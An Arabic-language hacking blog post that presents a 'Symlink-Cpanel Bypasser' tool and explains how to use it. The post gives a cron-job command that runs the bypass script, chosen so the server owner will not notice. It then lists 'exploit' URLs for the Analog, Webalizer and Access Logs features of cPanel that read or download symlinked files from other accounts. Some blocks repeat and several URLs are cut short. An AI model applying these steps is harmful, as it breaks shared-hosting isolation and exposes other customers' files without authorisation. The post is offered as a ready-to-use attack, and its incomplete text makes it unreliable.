Priv8~!/ Symlink-Cpanel Bypasser Tool [Public_Version]

لسلام عليكم ورحمة الله وبركاتة،

اليوم اقدم لكم اداة في تخطي الاختصار في السي بنل. بدون مقدمات نبدا في شرح الاداة.

بالاول راح نستخدم الكرون جوب-Cron jobs في تنفيذ الاومر وتعديل الوقت في الارسال من السي بنل حتى لاندع مجال للشك لصاحب السيرفر او غيره.




الامر المراد تنفيذه من خلال الكرون .



كود PHP:

echo "nu11 is h3r3" ~| bash Cpbypasser.sh -"nu11 bypass" -- l0v3rs14@gmail.com 
بحيث يكون
اقتباس:
~| bash Cpbypasser.sh
امر تنفيذ الاداة

وايضا

اقتباس:
"nu11 bypass" -- l0v3rs14@gmail.com
نقوم بستبدال الايميل الظاهر بالايميل المستخدم لديكم واسم الرساله او المحتوى
اقتباس:
nu11 bypass
اختياري

بعد ذالك نتوجه الى مسار المراد رفع فيه الاداة. وذلك عن طريق المسار التالي


كود PHP:
/home/username 


وننتظر لمده خمس الدقائق المده حتى تنفيذ الامر من الكرون جوب. على حسب الاختيار. والنتيجه

1- Dwonload Symlink file- تحميل الملف الذي قمنا بالاختصار عليه من خاصيه Access Logs



2- Webalizerftp Read Symlink file - قراءه الملف او الاستعراض.



3- Webalizer Read Symlink file - قراءه الملف او الاستعراض.



2- Analog Read Symlink file - قراءه الملف او الاستعراض.



تأكد تشغيل الاداة من السيرفر عن خلال الايميل مع المسارات المساعده والتوضيح في الاداة.




اقتباس:

<pre>
______ __ ____ ___
/ ____/___ ____ _____ ___ / / / __ )__ ______ ____ ______________ _____ _ _< /
/ / / __ \/ __ `/ __ \/ _ \/ / / __ / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ | | / / /
/ /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / /
\____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/
/_/ /____/_/
CPanel Symlink Bypasser [Public Version]
By Hannibal Ksa & R3m0t3 Nu11
</pre>


ANALOG EXPLOIT:

GO TO: https://yourbitch:2083/cpsession/tmp...bypass107.html
yourbitch=the cpanel url
cpsession=your cpanel session
cpsession=cpanel user


WEBALIZER FTP EXPLOIT:

GO TO: https://yourbitch:2083/cpsession/tmp...bypass107.html
yourbitch=the cpanel url
cpsession=your cpanel session
cpsession=cpanel user


WEBALIZER FTP EXPLOIT:

GO TO: https://yourbitch:2083/cpsession/tmp...bypass107.html
yourbitch=the cpanel url
cpsession=your cpanel session
cpsession=cpanel user


LOGS EXPLOIT:

GO TO: https://yourbitch:2083/cpsession/fro...raw/index.html
yourbitch=the cpanel url
cpsession=your cpanel session

THEN SCROLL DOWN 'TIL YOU SEE bypass.doc AND DOWNLOAD IT!





هاذا والصلاة والسلام ع اشرف الخلق والمرسلين محمد،

تعليقات

المشاركات الشائعة من هذه المدونة

CRLF injection [\r\n Carriage Return]

Study in Nosql-Injection-Mongodb